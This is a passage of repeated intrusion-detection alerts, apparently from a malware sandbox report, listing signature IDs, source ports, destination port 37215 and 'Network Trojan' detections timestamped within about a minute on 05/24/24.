              SID:2829579
              Source Port:50284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053486
              SID:2835222
              Source Port:55696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.411090
              SID:2835222
              Source Port:53426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.695252
              SID:2835222
              Source Port:44930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624798
              SID:2835222
              Source Port:44932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.491756
              SID:2829579
              Source Port:51400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.493661
              SID:2829579
              Source Port:32956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449247
              SID:2829579
              Source Port:35908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724504
              SID:2835222
              Source Port:40764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.975459
              SID:2835222
              Source Port:38882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446919
              SID:2835222
              Source Port:60228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.057514
              SID:2835222
              Source Port:59728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.455349
              SID:2835222
              Source Port:45732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.493210
              SID:2835222
              Source Port:54796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507487
              SID:2835222
              Source Port:56332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.166340
              SID:2835222
              Source Port:56930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.576544
              SID:2835222
              Source Port:45000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189524
              SID:2829579
              Source Port:36026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494304
              SID:2829579
              Source Port:46230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.532294
              SID:2829579
              Source Port:32992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.252745
              SID:2829579
              Source Port:53490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.429713
              SID:2829579
              Source Port:54684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.677406
              SID:2829579
              Source Port:60558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553716
              SID:2829579
              Source Port:46488
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.701011
              SID:2829579
              Source Port:54438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152583
              SID:2829579
              Source Port:49578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.066287
              SID:2835222
              Source Port:47642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797093
              SID:2829579
              Source Port:39712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536258
              SID:2829579
              Source Port:47994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361317
              SID:2835222
              Source Port:41604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278202
              SID:2829579
              Source Port:47218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481419
              SID:2835222
              Source Port:59212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535360
              SID:2829579
              Source Port:53498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.431480
              SID:2829579
              Source Port:59860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.594525
              SID:2829579
              Source Port:38140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.579949
              SID:2829579
              Source Port:39726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.873901
              SID:2829579
              Source Port:40496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.109266
              SID:2829579
              Source Port:53670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.601385
              SID:2835222
              Source Port:59606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111878
              SID:2829579
              Source Port:47886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456388
              SID:2835222
              Source Port:59172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.685252
              SID:2829579
              Source Port:58948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.302887
              SID:2835222
              Source Port:33748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484600
              SID:2835222
              Source Port:45502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100973
              SID:2835222
              Source Port:58718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.364395
              SID:2835222
              Source Port:42266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.065695
              SID:2835222
              Source Port:35632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360642
              SID:2835222
              Source Port:35844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049215
              SID:2835222
              Source Port:57440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.544142
              SID:2835222
              Source Port:52770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.875764
              SID:2829579
              Source Port:50442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.880979
              SID:2829579
              Source Port:34570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535620
              SID:2835222
              Source Port:39150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341586
              SID:2829579
              Source Port:58512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078091
              SID:2835222
              Source Port:43744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574473
              SID:2829579
              Source Port:43724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920615
              SID:2829579
              Source Port:51956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.105670
              SID:2835222
              Source Port:41906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278324
              SID:2829579
              Source Port:39898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341181
              SID:2829579
              Source Port:43180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.265856
              SID:2829579
              Source Port:42406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693458
              SID:2829579
              Source Port:53238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482714
              SID:2835222
              Source Port:39460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494624
              SID:2835222
              Source Port:47648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.492141
              SID:2829579
              Source Port:52034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802009
              SID:2829579
              Source Port:36902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.606298
              SID:2835222
              Source Port:39398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.921132
              SID:2835222
              Source Port:44506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.117965
              SID:2829579
              Source Port:42216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.050032
              SID:2829579
              Source Port:60294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246151
              SID:2829579
              Source Port:48406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284664
              SID:2829579
              Source Port:51776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574660
              SID:2835222
              Source Port:55408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.761983
              SID:2829579
              Source Port:47650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.621750
              SID:2829579
              Source Port:34936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482808
              SID:2835222
              Source Port:57742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233741
              SID:2835222
              Source Port:60282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448288
              SID:2835222
              Source Port:51962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153147
              SID:2835222
              Source Port:35914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.974258
              SID:2835222
              Source Port:49340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.879320
              SID:2835222
              Source Port:54952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.155074
              SID:2829579
              Source Port:44226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457728
              SID:2829579
              Source Port:47168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537762
              SID:2829579
              Source Port:60528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624399
              SID:2829579
              Source Port:55438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.698637
              SID:2829579
              Source Port:47516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.120591
              SID:2829579
              Source Port:34538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341372
              SID:2829579
              Source Port:57652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365168
              SID:2829579
              Source Port:36478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575211
              SID:2835222
              Source Port:57070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536210
              SID:2835222
              Source Port:52720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.103692
              SID:2835222
              Source Port:34228
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.369655
              SID:2835222
              Source Port:43642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165038
              SID:2829579
              Source Port:53874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573504
              SID:2835222
              Source Port:58584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.704917
              SID:2829579
              Source Port:39860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.355047
              SID:2835222
              Source Port:59002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637940
              SID:2829579
              Source Port:39844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.600206
              SID:2829579
              Source Port:49454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446983
              SID:2829579
              Source Port:59744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.486023
              SID:2835222
              Source Port:32890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358909
              SID:2829579
              Source Port:47072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.194496
              SID:2829579
              Source Port:52526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878753
              SID:2829579
              Source Port:60254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.123820
              SID:2835222
              Source Port:52724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.200693
              SID:2829579
              Source Port:58802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343483
              SID:2835222
              Source Port:36794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.826056
              SID:2835222
              Source Port:33930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280388
              SID:2829579
              Source Port:56206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157770
              SID:2835222
              Source Port:38822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246136
              SID:2829579
              Source Port:38820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.443992
              SID:2829579
              Source Port:50346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.539878
              SID:2829579
              Source Port:46058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.112805
              SID:2835222
              Source Port:51718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.267785
              SID:2829579
              Source Port:36304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165075
              SID:2829579
              Source Port:40482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.195120
              SID:2829579
              Source Port:56400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.411267
              SID:2835222
              Source Port:47370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.989841
              SID:2829579
              Source Port:59406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.531846
              SID:2829579
              Source Port:38396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186165
              SID:2835222
              Source Port:40668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663700
              SID:2829579
              Source Port:34820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857795
              SID:2829579
              Source Port:33962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.428900
              SID:2835222
              Source Port:46588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575120
              SID:2829579
              Source Port:49876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098708
              SID:2835222
              Source Port:59466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.971054
              SID:2829579
              Source Port:48638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.705430
              SID:2829579
              Source Port:58366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.129715
              SID:2829579
              Source Port:47012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232413
              SID:2835222
              Source Port:45236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.546385
              SID:2835222
              Source Port:38304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502424
              SID:2829579
              Source Port:60152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.063909
              SID:2829579
              Source Port:37000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.198776
              SID:2835222
              Source Port:44274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.769186
              SID:2835222
              Source Port:41160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480138
              SID:2829579
              Source Port:44866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579536
              SID:2829579
              Source Port:56230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.125426
              SID:2835222
              Source Port:42958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858384
              SID:2829579
              Source Port:59786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280910
              SID:2835222
              Source Port:33764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575149
              SID:2835222
              Source Port:60490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303424
              SID:2835222
              Source Port:59718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572384
              SID:2835222
              Source Port:33100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.515555
              SID:2829579
              Source Port:49872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.347070
              SID:2829579
              Source Port:39948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.122510
              SID:2829579
              Source Port:45602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724628
              SID:2829579
              Source Port:51974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.125485
              SID:2835222
              Source Port:56134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459116
              SID:2835222
              Source Port:59750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727351
              SID:2835222
              Source Port:41692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.287812
              SID:2835222
              Source Port:59428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.964015
              SID:2829579
              Source Port:41840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.697429
              SID:2835222
              Source Port:48654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278893
              SID:2829579
              Source Port:52782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055354
              SID:2829579
              Source Port:49284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.079851
              SID:2835222
              Source Port:42542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.819558
              SID:2829579
              Source Port:45906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394894
              SID:2835222
              Source Port:42308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460506
              SID:2835222
              Source Port:43424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044875
              SID:2835222
              Source Port:39192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.689761
              SID:2829579
              Source Port:35754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.689859
              SID:2829579
              Source Port:39526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400715
              SID:2829579
              Source Port:46240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.596650
              SID:2835222
              Source Port:34798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.873784
              SID:2829579
              Source Port:50700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.254437
              SID:2829579
              Source Port:49522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727291
              SID:2829579
              Source Port:38380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397254
              SID:2829579
              Source Port:48972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.064587
              SID:2835222
              Source Port:45766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.159747
              SID:2829579
              Source Port:52448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693221
              SID:2835222
              Source Port:37502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.480461
              SID:2835222
              Source Port:53960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.374511
              SID:2829579
              Source Port:40118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965409
              SID:2829579
              Source Port:41016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517269
              SID:2835222
              Source Port:38434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.152956
              SID:2829579
              Source Port:50298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484461
              SID:2829579
              Source Port:57764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118463
              SID:2835222
              Source Port:56302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.349878
              SID:2835222
              Source Port:35564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445205
              SID:2835222
              Source Port:41866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.070957
              SID:2829579
              Source Port:56636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446314
              SID:2835222
              Source Port:36872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.749304
              SID:2835222
              Source Port:41686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920320
              SID:2835222
              Source Port:45622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.456393
              SID:2829579
              Source Port:37532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062741
              SID:2829579
              Source Port:44940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332229
              SID:2835222
              Source Port:33650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459924
              SID:2835222
              Source Port:44166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061211
              SID:2835222
              Source Port:37166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.077628
              SID:2829579
              Source Port:49910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.378044
              SID:2829579
              Source Port:48324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.690203
              SID:2835222
              Source Port:59440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574408
              SID:2835222
              Source Port:38452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965418
              SID:2835222
              Source Port:53918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.063335
              SID:2835222
              Source Port:50998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.491962
              SID:2835222
              Source Port:44906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725697
              SID:2829579
              Source Port:38556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.121443
              SID:2835222
              Source Port:60604
              Destination Port:37215
